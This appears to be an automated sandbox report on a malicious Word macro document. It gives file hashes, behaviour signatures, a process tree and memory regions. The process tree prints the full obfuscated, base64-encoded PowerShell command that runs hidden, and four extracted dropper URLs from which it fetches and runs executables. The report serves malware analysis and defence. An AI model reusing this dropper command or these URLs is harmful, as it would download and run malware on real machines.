Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    28/05/2024, 22:27

General

  • Target

    7e9f335b49f7d026508d63b75bdc0f1f_JaffaCakes118.doc

  • Size

    121KB

  • MD5

    7e9f335b49f7d026508d63b75bdc0f1f

  • SHA1

    e87dd29e12164407d76276be13b9c10449a7d8c3

  • SHA256

    f294e3bee01492d9c7b373ed1b38540d720a125341c891bb2f1a8856227cc304

  • SHA512

    a1fc109a59783fa80ec8c6aaa71e476f2a71ab8ba7ff7848ecb89f64a5060b425e62b85a3645bbbc0624776d920873c70afff2c46883449a17d934ddf4391360

  • SSDEEP

    1536:E1KwMGDHEX0zZUsN+agwBNyd+5sv/UHDdi1Nnpfe40rCU/2qfEYE+umL:OzDkXs6a80gcjdUU5JZEh

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://macrospazio.it/p4kEoI7/

exe.dropper

http://ondernemerstips.nl/mPs8pP/

exe.dropper

http://planitsolutions.co.nz/tLLiAh4/

exe.dropper

http://franssmanmedia.nl/kNBIm7/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e9f335b49f7d026508d63b75bdc0f1f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHeLL.exe
        PowersHeLL -WinDowsTyle hidden -e JgAgACgAIAAkAFMASABFAGwATABpAGQAWwAxAF0AKwAkAHMAaABlAGwATABpAEQAWwAxADMAXQArACcAeAAnACkAKAAgACgAKAAiAHsAMQAzADMAfQB7ADAAfQB7ADUANQB9AHsANAA5AH0AewA1ADgAfQB7ADYANwB9AHsANgAwAH0AewAxADAANAB9AHsAMQAxADQAfQB7ADUAMgB9AHsAMQA2ADgAfQB7ADgANQB9AHsAMQA5AH0AewAxADQAfQB7ADYAMwB9AHsAMQAwADcAfQB7ADQANAB9AHsAOQA0AH0AewAxADUAOQB9AHsANQA5AH0AewAxADIANwB9AHsAMQAyADUAfQB7ADEANQA4AH0AewAxADMAMgB9AHsAMQA2ADcAfQB7ADIANAB9AHsAMQAzAH0AewA5ADgAfQB7ADMAMgB9AHsAMQA1AH0AewAyADYAfQB7ADYANQB9AHsANQA0AH0AewA4ADEAfQB7ADEAMgA4AH0AewAxADYANgB9AHsANQB9AHsANAA1AH0AewAzADUAfQB7ADgANgB9AHsAMwB9AHsAOAAwAH0AewAxADQAMQB9AHsAOAA4AH0AewA4ADcAfQB7ADQAOAB9AHsANgB9AHsAMQAwADEAfQB7ADEANQA0AH0AewAxADUANQB9AHsANwA1AH0AewA1ADcAfQB7ADEANAAwAH0AewAxADMAMQB9AHsAMgAwAH0AewA2ADQAfQB7ADEANQAzAH0AewAxADIAMAB9AHsAOQAwAH0AewA5ADYAfQB7ADcAMwB9AHsAMQA1ADAAfQB7ADEAMgAzAH0AewA0ADYAfQB7ADMANgB9AHsAMQA0ADIAfQB7ADkANwB9AHsAMQAzADcAfQB7ADkAOQB9AHsAMQAwADIAfQB7ADEAMAA1AH0AewA4ADMAfQB7ADYAMgB9AHsAMgA4AH0AewA5ADIAfQB7ADEAMQAzAH0AewAxADYAMgB9AHsAMQAyADkAfQB7ADgAfQB7ADEANgA1AH0AewAxADUANwB9AHsAMQA1ADIAfQB7ADEAMwA2AH0AewA5ADUAfQB7ADUAMAB9AHsAMQAwADAAfQB7ADMAMAB9AHsAMwA5AH0AewAxADQANgB9AHsAMQAzADgAfQB7ADYAOAB9AHsAMQA0ADMAfQB7ADEANQAxAH0AewA0ADIAfQB7ADEAMQAyAH0AewAxADcAfQB7ADEANAA5AH0AewA0ADMAfQB7ADEAMgAxAH0AewA5ADMAfQB7ADEAMgB9AHsAMQAzADAAfQB7ADEAMQAxAH0AewA4ADkAfQB7ADEAMAAzAH0AewAxADEAMAB9AHsAMQAzADkAfQB7ADEAMQA4AH0AewA4ADIAfQB7ADEAMgAyAH0AewAxADEAOQB9AHsAMQA2AH0AewAyADcAfQB7ADUAMwB9AHsAMQAwADYAfQB7ADgANAB9AHsAMQAyADYAfQB7ADcAOAB9AHsAMQA1ADYAfQB7ADEANgAxAH0AewAyADMAfQB7ADEANgAwAH0AewAyADUAfQB7ADMANwB9AHsAMQB9AHsANAAwAH0AewA0AH0AewAxADYANAB9AHsAMQAxADYAfQB7ADEAMAA5AH0AewAyADkAfQB7ADkAfQB7ADMANAB9AHsANwAwAH0AewAzADEAfQB7ADYAMQB9AHsAMgAyAH0AewAxADEANwB9AHsANAAxAH0AewA2ADYAfQB7ADEAOAB9AHsAMQAxAH0AewAxADMANAB9AHsAMgAxAH0AewA5ADEAfQB7ADYAOQB9AHsANwB9AHsANAA3AH0AewA3ADQAfQB7ADcANwB9AHsAMQAzADUAfQB7ADEANAA3AH0AewA1ADEAfQB7ADcAMQB9AHsAMQAxADUAfQB7ADMAMwB9AHsAMQAyADQAfQB7ADcANgB9AHsAMQA0ADgAfQB7ADEANAA0AH0AewAzADgAfQB7ADUANgB9AHsANwAyAH0AewAxADAAOAB9AHsAMQA2ADMAfQB7ADEAMAB9AHsAMQA0ADUAfQB7ADIAfQB7ADcAOQB9ACIAIAAtAGYAJwBuAHMAJwAsACcAZgBjACAAaQBuACAAcgAnACwAJwB7ACcALAAnAGwAaQBlAG4AdAAnACwAJwBEAEMAJwAsACcAbQAuACcALAAnAD0AIAByAEMAUwBuACcALAAnAG0AcgB3AGkAJwAsACcAbwBuAGQAZQByACcALAAnAHIAQwBTAFkAWQAnACwAJwB9ACcALAAnADEAOAAnACwAJwBpACcALAAnAEIAZAAnACwAJwBCAGQAKQAgAHIAYQAnACwAJwBiAGoAZQBjAHQAJwAsACcAUABzAHEAQgBkACAAJwAsACcAbgBtAGUAJwAsACcAdwBsAGUAJwAsACcAYwBxAEIAZAArAHEAQgBkAHQAcQAnACwAJwBBAEQAQwBYACAAPQAgACcALAAnAGMALgAxADgAJwAsACcAbgAnACwAJwBkACkAOwAnACwAJwBkACsAcQAnACwAJwByAGUAYQBjACcALAAnAHEAQgBkACcALAAnACsAIAByACcALAAnAGkAdAAvAHAANAAnACwAJwB7ACcALAAnAGkAdABzAG8AbAB1AHQAJwAsACcAdwAnACwAJwBvACcALAAnAHEAJwAsACcAVQAuADEAOABUAEQAbwAnACwAJwB0AC4AVwBlAGIAJwAsACcANgBNACcALAAnAGgAKAByAEMAUwBhAHMAJwAsACcAQwBTACcALAAnAGkAbwAnACwAJwBDAFMAQQAnACwAJwBhAGQAJwAsACcAYQBuAHMAcwAnACwAJwAuAG4AbAAvAGsATgBCACcALAAnAG0AOwAnACwAJwBOAGUAJwAsACcALwAnACwAJwBtACcALAAnACAAJwAsACcAYQBzAGQAIAA9ACcALAAnAGgAdAAnACwAJwBTAFMARABDACcALAAnAGUAcQAnACwAJwBDAFMATgBTAEIAIAArACcALAAnACAAJwAsACcAYQBkACcALAAnAFMARABDACkAJwAsACcAMwAzACcALAAnACAAJgAnACwAJwBZAFkAVQAgAD0AJwAsACcAZABuAHEAQgBkACsAcQAnACwAJwBXACcALAAnAC4AJwAsACcAbgBkACcALAAnAHEAQgBkAA0ACgBoAHQAdABwADoALwAvACcALAAnACkAJwAsACcARgBJAG0AcgAnACwAJwAoAHEAQgAnACwAJwBpAEEAaAA0AC8AQABoAHQAdABwACcALAAnAHIAJwAsACcAbQByACcALAAnACkAOwAmACgAcQBCAGQASQBuAHYAbwBxAEIAJwAsACcAOwBiAHIAJwAsACcAbwBlAHMAJwAsACcAcgAnACwAJwAwADAAMAAsACAAMgA4ADIAMQAnACwAJwBlAG0AcQBCAGQAKQAnACwAJwB3ACcALAAnAHEAJwAsACcAfQB9ACcALAAnADsAcgAnACwAJwBTACcALAAnAHEAJwAsACcAbwAnACwAJwAoAHEAQgBkACcALAAnAHcALQBvAGIAagBlACcALAAnAEMAJwAsACcAUwBCACcALAAnAFMATgAnACwAJwBTAFMARAAnACwAJwBkAGUAcwBvAGwAJwAsACcAVABUAG8AUwB0ACcALAAnAGsARQBvAEkANwAvACcALAAnAC4AUwBwAGwAJwAsACcAcgAnACwAJwBQAC8AQAAnACwAJwB1AGMAJwAsACcAZwA3AC8AJwAsACcALQAnACwAJwBoAHQAdAAnACwAJwB0AHAAOgAvAC8AcABsAGEAbgAnACwAJwBzACcALAAnAHAAOgAvAC8AbQBhAGMAcgBvAHMAcABhACcALAAnAEMAJwAsACcAQgAnACwAJwB6AGkAJwAsACcAIAAnACwAJwBvACcALAAnAGUAYQBrACcALAAnAHkAJwAsACcAIAA9ACAAJwAsACcAcgBDACcALAAnAG0AYQAnACwAJwBAAGgAJwAsACcAZAAnACwAJwBkACsAcQBCAGQAawAnACwAJwApAHsAdAByACcALAAnAGwAbQByAHcATwAnACwAJwArACAAJwAsACcAZABlACcALAAnAGEAJwAsACcASQBtADcALwBxAEIAZAAnACwAJwBCACcALAAnAG0ALgBiAHIAJwAsACcAQgBkACsAcQBCAGQAZQAtAEkAdAAnACwAJwBCAGQAJwAsACcALgBlAHgAJwAsACcAIAAuACgAcQAnACwAJwB5AHMAdAAnACwAJwB0AHAAOgAvAC8AJwAsACcAdAAoAHEAQgBkAEAAcQBCAGQAKQA7ACcALAAnAFMAJwAsACcAcQBCAGQAKwBxAEIAZAB3ACcALAAnAHIAQwBTACcALAAnAFQAKAByAEMAUwBhAHMAZgAnACwAJwBOAGcAJwAsACcAOABwACcALAAnAEAAJwAsACcAYwBvAC4AbgB6AC8AdABMAEwAJwAsACcAcgBDAFMAZQBuAHYAOgBwAHUAYgBsAGkAYwAgACcALAAnACkAOwByAEMAJwAsACcAQwAnACwAJwBnACcALAAnADoALwAvAGYAJwAsACcAcgAnACwAJwBjAGEAdABjAGgAJwAsACcAbgBzAC4AJwAsACcAMQA4AFQAKAApACwAIAByAEMAJwAsACcAKAAnACwAJwBkAGkAYQAnACwAJwAuAGMAbwAnACwAJwByACcALAAnAGkAcABzAC4AbgBsAC8AbQBQAHMAJwAsACcAdAByAGkAJwAsACcAYQBkAGEAJwAsACcAcwBkAC4AbgBlAHgAdAAoADEAMAAnACwAJwBCAGQAKwBxAEIAZABlACcALAAnAHMAdAAnACwAJwBuAGUAJwAsACcAQwBTACcALAAnAGYAbwAnACwAJwBxAEIAJwAsACcAdAAnACwAJwA7ACcALAAnAFgAJwAsACcAbgBlAG0AZQByACcALAAnAGUAJwAsACcAcQBCACcALAAnAEIAZAArAHEAQgBkACcAKQApAC4AcgBFAHAAbABhAEMARQAoACgAWwBjAGgAYQBSAF0AMQAxADQAKwBbAGMAaABhAFIAXQA2ADcAKwBbAGMAaABhAFIAXQA4ADMAKQAsAFsAUwBUAHIAaQBOAGcAXQBbAGMAaABhAFIAXQAzADYAKQAuAHIARQBwAGwAYQBDAEUAKAAnAGUAUABzACcALAAnAFwAJwApAC4AcgBFAHAAbABhAEMARQAoACgAWwBjAGgAYQBSAF0AMQAxADMAKwBbAGMAaABhAFIAXQA2ADYAKwBbAGMAaABhAFIAXQAxADAAMAApACwAWwBTAFQAcgBpAE4AZwBdAFsAYwBoAGEAUgBdADMAOQApAC4AcgBFAHAAbABhAEMARQAoACgAWwBjAGgAYQBSAF0ANAA5ACsAWwBjAGgAYQBSAF0ANQA2ACsAWwBjAGgAYQBSAF0AOAA0ACkALABbAFMAVAByAGkATgBnAF0AWwBjAGgAYQBSAF0AMwA0ACkALgByAEUAcABsAGEAQwBFACgAJwBtAHIAdwAnACwAJwBgACcAKQAgACkA
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1412

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      c09171f863fe693c95b68a15cfa2f725

      SHA1

      e2d56d75f071e713fd0a142bd9d0d9388a7e4c00

      SHA256

      b38abd585fcaa745d5c26eac8743d163b503ede8f5e69a9295b365d85acbd609

      SHA512

      9e5f0d575a9f6b5d415681b35bdf856ab7e226847d0b6e3672b8be66e0f5bb1f42123b5898719a358f063aca1779444ccaab615154cb747589abd1d44c5938b3

    • memory/1028-19-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-23-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-6-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-11-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-27-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-103-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-235-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-234-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-72-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-59-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-45-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-40-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-29-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-26-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-25-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-24-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-0-0x000000002F791000-0x000000002F792000-memory.dmp

      Filesize

      4KB

    • memory/1028-22-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-2-0x00000000714FD000-0x0000000071508000-memory.dmp

      Filesize

      44KB

    • memory/1028-20-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-15-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-17-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-16-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-18-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-14-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-13-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-12-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-88-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-58-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-28-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-21-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-10-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-9-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-8-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-7-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-242-0x00000000006E0000-0x00000000007E0000-memory.dmp

      Filesize

      1024KB

    • memory/1028-243-0x00000000714FD000-0x0000000071508000-memory.dmp

      Filesize

      44KB

    • memory/1028-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1028-259-0x00000000714FD000-0x0000000071508000-memory.dmp

      Filesize

      44KB